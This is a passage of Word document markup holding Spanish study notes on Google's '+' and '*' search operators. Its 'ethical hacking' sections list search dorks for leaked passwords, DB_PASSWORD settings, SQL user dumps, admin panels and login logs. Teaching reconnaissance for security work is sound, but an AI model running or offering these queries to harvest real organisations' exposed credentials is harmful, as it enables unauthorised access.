          <w:p w14:paraId="6118C369" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>→ Google busca: "administracion bases datos" (ignora "de")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E0D720B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Con +:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34DCD887" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>administración +de bases +de datos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="176B864B" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>→ Google busca exactamente con "de"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="130B9728" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00B941CC" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="1158BDC9">
                <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EB29DF1" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Para caracteres especiales:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6561FA2B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Acentos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AC738BB" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>José</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47D85A77" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>→ Google encuentra: "Jose" y "José"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52135CDF" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BDEC874" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>+José</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CBCE421" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>→ Google SOLO encuentra: "José" (con acento)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3588A599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Letra ñ:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5645AFBA" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>año</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A7367E8" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>→ Google puede mostrar: "ano" y "año"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48661A5B" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="100DDE31" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>+año</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F11BC10" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>→ Google SOLO busca: "año" (con ñ)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6668AFD7" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00B941CC" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="14757D39">
                <v:rect id="_x0000_i1047" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="592EB906" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Uso en hacking ético:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="707D06ED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Buscar configuraciones específicas:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="077F9395" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>+contraseña +ñ site:empresa.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="444D7ABE" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>→ Archivos en español con acentos exactos</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6AAD07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Forzar términos técnicos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="767CD5DC" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>+C++ programming</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E253D8D" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>→ Google no ignora los símbolos "++"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65B721F6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Búsquedas precisas:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D9ECF1B" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>+de +la empresa filetype:pdf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="107C1880" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:lastRenderedPageBreak/>
              <w:t>→ PDFs que contengan exactamente "de la"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03C4AA3D" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00B941CC" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="7A51A5D5">
                <v:rect id="_x0000_i1048" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC3A16E" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nota importante:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E14C670" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="00647ECA">
              <w:t xml:space="preserve"> Google ha deprecado parcialmente el operador + en favor de las comillas " "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E0D897B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Alternativa moderna:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="186028E0" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:t>+la password    →    "la" password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0CD026" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00B941CC" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="2953CA13">
                <v:rect id="_x0000_i1049" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="529A132D" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00647ECA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>En resumen:</w:t>
            </w:r>
            <w:r w:rsidRPr="00647ECA">
              <w:t xml:space="preserve"> El + fuerza a Google a no ignorar palabras comunes o caracteres especiales, útil para búsquedas muy específicas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D103AEB" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00B25916">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="358F4BDA" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D96CCAA" w14:textId="12AA97D4" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00647ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D368134" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00647ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Descripción:</w:t>
      </w:r>
      <w:r w:rsidRPr="00647ECA">
        <w:t> El asterisco se usa como comodín para uno o varios términos desconocidos. Suele usarse con comillas para mantener la posición.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F079403" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00647ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejemplo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00647ECA">
        <w:t> "confidential * report"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C6150D" w14:textId="77777777" w:rsidR="00647ECA" w:rsidRPr="00647ECA" w:rsidRDefault="00647ECA" w:rsidP="00647ECA">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00647ECA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qué hace:</w:t>
      </w:r>
      <w:r w:rsidRPr="00647ECA">
        <w:t> Encuentra frases con “confidential”, luego cualquier palabra, y termina con “report” (por ejemplo, “confidential company report”)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647ECA" w14:paraId="43BB34EA" w14:textId="77777777" w:rsidTr="00647ECA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E9C20E" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>* (Asterisco/Comodín) - SUPER BREVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C645E2" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sintaxis:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B73F526" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>"término * término"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A908AFE" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>¿Qué hace?</w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:t xml:space="preserve"> Funciona como </w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>comodín</w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:t xml:space="preserve"> que reemplaza </w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>una o más palabras desconocidas</w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46312A75" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="00B941CC" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="7CC596F6">
                <v:rect id="_x0000_i1050" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="6736B1D4" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Ejemplos básicos:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3850FE5D" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>"admin * panel"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="163B024A" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>→ Encuentra:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70D395D0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t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>- admin login panel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="002750F7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 xml:space="preserve">  - admin control panel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F59C5B4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 xml:space="preserve">  - admin dashboard panel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32029084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 xml:space="preserve">  - admin access control panel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="276EDF10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"password for *"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63702ABF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→ Encuentra:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6124DB98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 xml:space="preserve">  - password for admin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E0939DF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 xml:space="preserve">  - password for database</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22FE102E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 xml:space="preserve">  - password for root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07BF8B55" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:t>- password for mysql server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A50EE74" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="00B941CC" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="433D520E">
                <v:rect id="_x0000_i1051" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DD8C948" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Uso en hacking ético:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30AEB3A3" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1. Buscar patrones de credenciales:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="392E3E05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"username * password *"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E0E1C6F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→ username: admin password: 12345</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E65A744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→ username is root password is secret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CCEA67B" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2. Encontrar configuraciones:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED5A129" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>"DB_PASSWORD * localhost"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="649491FC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→ DB_PASSWORD = 12345 localhost</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32B1668F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→ DB_PASSWORD: secret123 localhost</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AB85902" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3. Archivos con estructura conocida:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D3B927E" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="00B941CC" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00B941CC">
              <w:t>filetype:sql "INSERT INTO users * password *"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="216FD3C7" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>→ Dumps SQL con inserts de usuarios</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A1C3143" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4. Logs con formato específico:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069ACB7C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"failed login attempt * from IP *"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7CF5FC" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>→ Logs de intentos fallidos con IPs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03F5CF9E" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="00B941CC" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="2281B223">
                <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="082A98AC" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Cuándo usar comillas:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="652FC1C5" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:t xml:space="preserve"> Sin comillas (no mantiene posición):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="742980C0" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>admin * panel</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="773D2BF3" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>→ Busca "admin", cualquier cosa, "panel" (pueden estar muy separados)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00CC0031" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="002006C0">
              <w:t xml:space="preserve"> Con comillas (mantiene secuencia):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D301578" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>"admin * panel"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28B462E1" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="002006C0" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="002006C0">
              <w:t>→ Frase coherente con palabra(s) en medio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B421F41" w14:textId="77777777" w:rsidR="002006C0" w:rsidRPr="002006C0" w:rsidRDefault="00B941CC" w:rsidP="002006C0">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:pict w14:anchorId="649BB464">
                <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
              </w:pict>
            </w:r>
          </w:p>
